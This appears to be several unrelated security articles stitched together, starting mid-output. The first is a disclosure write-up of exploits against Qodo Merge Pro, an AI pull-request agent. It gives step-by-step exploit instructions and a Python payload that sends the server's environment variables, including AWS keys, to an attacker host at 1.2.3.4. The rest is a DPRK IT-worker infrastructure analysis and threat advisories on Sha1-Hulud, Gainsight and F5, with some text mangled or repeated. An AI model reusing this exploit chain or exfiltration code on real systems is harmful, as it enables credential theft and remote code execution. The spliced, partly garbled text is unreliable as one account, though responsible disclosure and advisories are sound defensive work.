"PasswordLastUsed": "2025-03-18T08:19:15Z",
"Tags": [
{
"Key": "(CENSORED)",
"Value": "(CENSORED)"
}
]
}
}The user name is Administrator. That sounds pretty good so far. But let's get a confirmation.
We then enumerate groups the Administrator user is part of:
$ aws iam list-groups-for-user --user-name Administrator
{
"Groups": [
{
"Path": "/",
"GroupName": "Administrators",
"GroupId": "(CENSORED)",
"Arn": "arn:aws:iam::(CENSORED):group/Administrators",
"CreateDate": "2022-08-07T12:54:17Z"
}
]
}The Administrator user is in a group called Administrators (note that there's an "s" at the end). Finally, we list the group policies attached to the Administrators group:
$ aws iam list-attached-group-policies --group-name Administrators
{
"AttachedPolicies": [
{
"PolicyName": "AdministratorAccess",
"PolicyArn": "arn:aws:iam::aws:policy/AdministratorAccess"
}
]
}The Administrators group has the AdministratorAccess policy attached. This is a built-in AWS policy that grants administrator privileges. This is now confirmed. We have leaked an AWS Secret Key with AdministratorAccess permissions, granting us full access to AWS services and resources in Qodo Merge Pro's AWS account!

After we responsibly disclosed this to Qodo, they eventually applied a proper fix to the issue. They disabled Dynaconf dynamic variables by setting the AUTO_CAST_FOR_DYNACONF environment variable to "false". This effectively disables Dynaconf dynamic variables such as interpreting @format, @json or @jinja. This finally fixes the root issue. Kudos to Qodo for fixing it.
But this was not the end. A few months later, as I was writing this blog post, I had another look at the Dynaconf website and noticed that Dynaconf supported .py files for configuration. I immediately thought that this could potentially be exploited.

The Dynaconf documentation contains an example showing how configuration files can include other configuration files. For example, a configuration.toml file could include another file named other.toml, or even another file in another format, such as a Python file named config.py. This can be achieved by placing a key named dynaconf_include with an associated value that is a list of paths to files that should be included, in a config file. So, that means we could have a .pr_agent.toml file at the root of a GitHub repository and if this file includes a .py file, Qodo Merge Pro will execute the code in the included Python file. Here's an example configuration file that would do this:
dynaconf_include = ["config.py"]
[default]
foo="bar"Now, for this to be exploitable by an attacker, an existing Python file that does something malicious when executed needs to exist locally on the Qodo Merge Pro GitHub app server. So far, we can execute any Python file which is already present on the file system. But there's not much we can do with existing files since there is no way pass arguments to those files. It would be much more interesting if we could write an arbitrary Python file and then execute it. This is where the /help_docs tool comes in.
Qodo Merge Pro recently introduced a new tool that can be invoked by writing a PR comment such as /help_docs some question?
This tool can be configured to git clone a repository that contains documentation files (for example Markdown files) so that when a user invokes the tool with /help_docs, the tool tries to answer the question based on the contents of the documentation files present in the git cloned repository. The repository is git cloned to a temporary directory with a random name under /tmp. Also, Qodo Merge Pro quickly deletes this directory as soon as it's done reading the files in it. There's a race condition to be exploited here if we can execute the Python file before it gets deleted.
Indeed, this can be exploited by crafting a documentation repository that contains a malicious Python file, then ask Qodo Merge Pro to answer a question based on this repository so that it git clones the repo to some directory in /tmp and therefore copies our malicious Python file somewhere under /tmp.
Now, this is not straightforward to exploit in the current configuration because the time window to trigger the dynaconf_include is very short since the git cloned repo gets deleted quickly after git clone is performed. But this operation can be delayed by adding 100,000 dummy .txt files in our documentation repository. Now Qodo Merge Pro will spend a few seconds going through all those files before deleting the temporary directory, leaving a much larger time window for exploitation.
The last missing piece to the puzzle is the precise location of our malicious Python file, since it gets cloned to a temporary directory with a random name, there's no way for an attacker to guess this filename in advance. Well, since dynaconf_include allows paths that contain globs, this is actually not a problem. A glob can be used to match any sub-directory that contains our Python file.
To recap, here are the detailed steps to exploit this vulnerability:
.pr_agent.toml in this repo with the following contents:dynaconf_include = ["/tmp/**/aaaa_some_unique_filename_very_unique.py"]
[default]
foo="bar".pr_agent.toml in this repo with the following contents:[pr_help_docs]
repo_url = "https://github.com/myusername/repoC.git"
docs_path = "docs" # The documentation folder
repo_default_branch = "main" # The branch to use in case repo_url overwritten
supported_doc_exts = [".md", ".mdx", ".rst"]docs folderdocs/md/foobar.md with dummy contentsdocs/other/file{1-100000}.txt where each file contains a single character, for example "a"docs/aaaa_some_unique_filename_very_unique.py with the following contents, where 1.2.3.4 is a web server that we control where we log incoming HTTP requests. Note that this file's contents can be replaced with any Python code that will be executed on the Qodo Merge Pro GitHub app server:import os
import json
import urllib.request
# send those env vars via http here
payload = dict(os.environ)
# Convert to JSON and encode
json_data = json.dumps(payload).encode("utf-8")
url = "http://1.2.3.4"
# Create a request with headers for JSON
req = urllib.request.Request(
url,
data=json_data,
headers={"Content-Type": "application/json"},
method="POST"
)
# Send the request and read the response
with urllib.request.urlopen(req) as response:
result = response.read().decode("utf-8")
FOO="BAR"On our server at 1.2.3.4 we received the leaked environment variables, which contained their AWS secret key, again! I was surprised to see that the AWS secret key was the same and that it had not been rotated since we disclosed the other vulnerability. Also, the key still had AdministratorAccess permissions. Again, we had full access to their AWS infrastructure but we also had a direct way to get RCE on the GitHub app production server now.
After we responsibly disclosed this new vulnerability to Qodo, they quickly fixed it.
Their fix disabled Dynaconf core_loaders and added a custom in-house loader that restores the default features but disallows includes, preloads and various other dangerous Dynaconf features an attacker may leverage. Here are the 2 pull requests that implemented this fix:
Qodo also rotated their AWS secret key. It's very important to rotate secrets as soon as they have been compromised. Even if a security researcher is not a malicious person, once the secret has been leaked, one should assume it's compromised. And since this secret gave access to other secrets, other secrets should be rotated too. AdministratorAccess is a very dangerous permission and one should follow the least privilege principle when granting permissions.
We were able to obtain the AWS Admin key of Qodo Merge Pro.
Let's reflect on what this means. A malicious person who has their hands on this AWS secret key could do a lot of damage.
Indeed, this means they could do the following, to name a few examples:
This is a serious vulnerability with critical impacts.
During round 3, we additionally obtained direct RCE on the Qodo Merge Pro Github App server. Therefore, not only letting us leak their AWS secret key (again) and have the same impacts as described above, but also execute arbitrary code on the machine directly. This means, the AWS key is not even needed to read/write to Qodo Merge Pro users' repositories in this case, since we have RCE on the production Qodo Merge Pro GitHub app machine, and this machine has access to user code.
We responsibly disclosed the first critical vulnerability to Qodo by email in April 2025. They acknowledged the issue and pushed a fix the next day. This is now fixed in Qodo Merge Pro.
What about the open source Qodo Merge? Qodo released v0.29 that includes a fix for this vulnerability on May 17. Therefore, this is now also fixed in the open-source version.
We also responsibly disclosed the second critical vulnerability (Round 3 - Dynaconf include + /help_docs) to Qodo by email in September 2025 and this is now fixed.
After the disclosure of the Round 3 vulnerability, Qodo stated that this leaked AWS secret key with admin permissions was for a development only environment where no customer data is stored. We sent them the list of EC2 instance names and secret names in their secrets manager, some of which contained "prod" in their name, suggesting that there may be some overlap between their development and production environments:
$ aws secretsmanager list-secrets | jq -r '.SecretList.[].Name'
******-prod-********-service-account
******-prod-**********-key
******-prod-*******-key
******-prod-******-auth
******-prod-******-auth
******-prod-******-key
******-prod-**********-token
****************************************************************************
****************************************************************************
****************************************************************************
****************************
**********
*************************
*******************
****************
****************
************************
**********************
********************
$ aws ec2 describe-instances \
--query 'Reservations[*].Instances[*].Tags[?Key==`Name`].Value | []' \
--output text
**********************
*******************
******-prod-******
********************
************************
************************
**************
*****************
********
************
********
********************
*********************Qodo replied and said that these were misnamed.
Regardless of what environment the AWS secret gave access to, the RCE vulnerability on the production GitHub app server could have been exploited to get read and write access to customer repositories.
Here is a summary of the disclosure timeline:
Fixing security vulnerabilities can be hard. Blocking an exploit is one thing, but that may only be solving half of the problem. One should make sure to cover all variants of an exploit and address the root issue directly. Software developers often depend on third party libraries that have many features. One should review those dependencies carefully and make sure that the features offered by those libraries have been covered in the threat model.
Permissions are still a problem. While it may be convenient to have a key that unlocks all doors, if that key ends up in the wrong hands, the consequences can be devastating. When a secret is compromised, it should be rotated immediately. Once again, security should be built-in from day one and is a continuous process. It happens to everyone and it's not a matter of if, but a matter of when and whether you're prepared for it or not. Designing your systems so it minimizes the impacts in case of a compromise and having a plan ready in case of compromise is a good start.
Following a compilation of mail republished by @Sttyk we used Hudson rock to legitimate the data provided in this mail dump and found many artifacts that belong to DPRK IT Workers. In this article we will focus on a reconstituted infrastructure and the environment of this structure.
During our investigation we found that they use “IP-msg” or IP messenger an app used widely inside of their infrastructure to communicate between different teams, with that data, we added more context to our first finding where we only had local IPs.

It seems that they have a single unified network for everyone working as a foreign worker.
As noticed by NKinternet we mainly saw these ranges being used among IT workers, the ranges 188.43.88.0/24 ; 188.43.136.0/24 ; 83.234.227.0/24 are also used by many companies not related with North Korea at the time we are looking at these ranges.
In Russia we can say with moderate confidence that they contain both residential IP’s and Proxies because some IP addresses are related to legitimate companies, most of which are transport companies.
As found by NKinternet the note below gives us more context on the purpose of these public IP addresses.

From this note we pivoted with the password of the Hong Kong proxy provided and we found a private IP address linked to the network 192.168.91.XXX where we can find most proxies and servers.

We can note the usage of squid proxy by the port used “3128” and we can say with low confidence that unauthorized access are logged on the “rgr” log aggregator. Each proxy is used for different purposes for example 192.168.91[.]51:3128 is used to redirect telegram requests according to a “smart proxy” configuration file found on Hudson rock, there is another pool of proxy servers identified as “PTC2” on the port 808 these servers has been found on some IT workers web browser and saved credentials which is also used for their browsing, while we don’t understand the choice of getting multiple types of proxies to do the same thing which is redirecting the browsing traffic.


The mention “RB” which is a proxy as we can see on the chat logs has been mentioned on a message from “Victory” that we attribute as an IT administrator.


According to the urls accessed by the local users and the message from the IT administrator we can say that this specific server expose the port 80 to facilitate some internal tasks.
Inside this server they must indicate the following information:
“email” = A mail
“identifier” = A mail
“birth” = birth date
“Machine info” = Product key windows
“team” = It might be composed with [Department number + team number] [example 821-39]
“Username” = Internal name
“UserID” = ID declared on this serverTo coordinate all this workforce they have a centralized way to report such as the financial network segment that we can attribute by the name of the URLs visited found on their browser history. We noticed the usage of the same type of servers on other part of the infrastructure which seems to be for reporting purposes of their activities.

By using only the stealer logs pulled we were able to find chat logs from IP messenger, a software widely used among North Korean people.

Translation:
"Comrade Director says to work on that project together with [that] comrade. Have you reviewed the source code sent yesterday?"
With these chats we can see patterns such as north Korean patterns of languages such as “Comrade”, “Comrade + name, Comrade + function with an authoritative way to talk. It seems that not all chats are like that, North Korean IT workers switched to English surely to improve their skills because they need to improve their English to speak fluently during their job interview.

As the DPRK fake IT workers speak many languages mainly English, Korean, Chinese, Russian and Japanese it’s hard to know if they have access to the infrastructure remotely with a VPN or if they are all in the same place, we can say with low confidence that some employees have a remote access to this infrastructure based on diverse time zones set on their computer that can be also used to only look at the time easily to their target country, their google history to convert “myr” (Malaysia), “sgd” (Singapore), ”lpa” (India),“rmb” (China) currencies to USD See [Annex 1] and their travel to the same countries cited before.
Cholima group shared a chat log that we were not able to retrieve on their blog, it has been reshared by @Sttyk on X as a screenshot that we crossed with the report of MSMT. By adding the data of the screenshot and the data of the chat gathered on Hudson rock we were able to identify a few entities of the UN designated entities, please refer also to [Annex 3].

Here is a table of identified acronym with moderate confidence.
Hudson rock (for the stealer logs)
Recorded future platform (for the confirmation of residential proxies)
https://x.com/SttyK/status/1997411128897646988 (for the naming conventions see Annex 3)
[Department + Team number ]
Letters can be only the team without the number or a company acronym
A new wave of NPM supply-chain attacks, collectively named Sha1-Hulud 2.0, has compromised multiple high-profile package scopes, including Zapier and ENS Domains. The trojanized packages contain malicious preinstall scripts that harvest secrets from developer environments and CI pipelines, exfiltrate data through GitHub repositories and workflows, and attempt self-propagation. The campaign represents a major escalation in NPM ecosystem threats, blending stealthy loaders, automated spreading, and destructive fallback behavior.
(Partial List, for the full exhaustive list please see the appendix of https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains)
The attack is similar to its predecessor, and follows a similar flow with some minor changes. The attack format follows the steps below, and notably now includes the capability for destructive actions.
preinstall Executionbun_environment.js.cloud.json, environment.json).SHA1HULUD.discussion.yaml) that exfiltrate secrets.Shai-Hulud containing exfiltrated data (double-encoded).To reduce risk from the ongoing NPM supply chain attacks, the following is recommended:
npm cache clean --forceShai-Hulud.github/workflows/shai-hulud)The CFC is closely monitoring the ongoing campaign and will provide further updates as necessary. Additionally a threat hunting campaign will be launched based on any available IOC's.
The CFC is closely monitoring the ongoing campaign and will provide further updates as neccessary. Additionally a threat hunting campaign will be launched based on any available IoC's.
On 19–21 November 2025, Salesforce detected unusual and unauthorized activity associated with Gainsight-published Connected Apps installed in customer Salesforce orgs. This activity appears to involve OAuth token misuse, allowing threat actors to make API calls into customer environments through the delegated privileges of the Gainsight applications.
Salesforce responded by revoking all access and refresh tokens associated with Gainsight-published integrations and temporarily removing the applications from the AppExchange while investigations continue. Gainsight has acknowledged the incident and engaged Mandiant for forensic investigation.
Gainsight emphasizes that the issue is not caused by a vulnerability within Salesforce itself, but arises from external OAuth access to Salesforce via third-party applications. The threat actor ShinyHunters has claimed responsibility; attribution remains unverified.
Salesforce initially identified three impacted customer orgs, later expanded as the investigation continued (exact number not publicly disclosed).
The following actions should be prioritized immediately:
Immediate Containment
Log Review & Threat Hunting
Access Control Hardening
Third-Party Risk Controls
Communication & Stakeholder Coordination
Indicators of Compromise (IOCs) (from Salesforce Help Article ID 005229029)
In or around August 2025, F5 discovered that a sophisticated, likely nation‑state threat actor had gained and maintained persistent access to internal F5 systems. In particular, the actor appeared to be after product development and engineering knowledge bases. The attacker exfiltrated files which included source code and technical documentation related to F5’s BIG-IP, F5OS, and other similar offerings. F5 reports that they have contained the intrusion, engaged third‑party forensic/security firms, and begun providing upgraded software and guidance to customers. As of now, F5 states there is no confirmed evidence of exploitation of undisclosed vulnerabilities in customer environments.
It is important to note that theft of source code and internal design details raises the risk that new attack vectors or zero-day exploits could emerge over time.
Based on current statements from F5 the following are the product lines believed to be impacted or at risk:
Based on current details we know that the attackers maintained long-term access to F5's internal systems, which led to the exfiltration of files that included source coded, and undisclosed vulnerabilities. Per F5 they do not believe that the supply chain pipeline was tampered with, and that no code was modified to introduce backdoors. However, based on the duration and access that the adversaries had they would have gained deeper visibility into internal code, architectures, and possibly even development-time vulnerabilities. Given that this notice was released alongside the Quarterly Security Notification (K000156572), and include newly released vulnerabilities, it is possible that they may be tied to this. Below are two such recent vulnerabilities which highlight that functionality modules may be attacked via malformed inputs, possibly leveraging knowledge gained from exfiltrated code:
bd process may terminate, causing availability problems. Affects versions prior to certain patched releases (e.g. < 17.5.1.3, < 17.1.3, < 16.1.6.1).bd when a security policy is configured on a virtual server.While F5 works to remediate and support customers, the following mitigations can reduce potential exposure:
The CFC is actively monitoring the situation and will continue to research and provide our findings. Additionally, we have implemented increased awareness for activity involving F5 BIG-IP. At this time, the main recommendations are to do the following: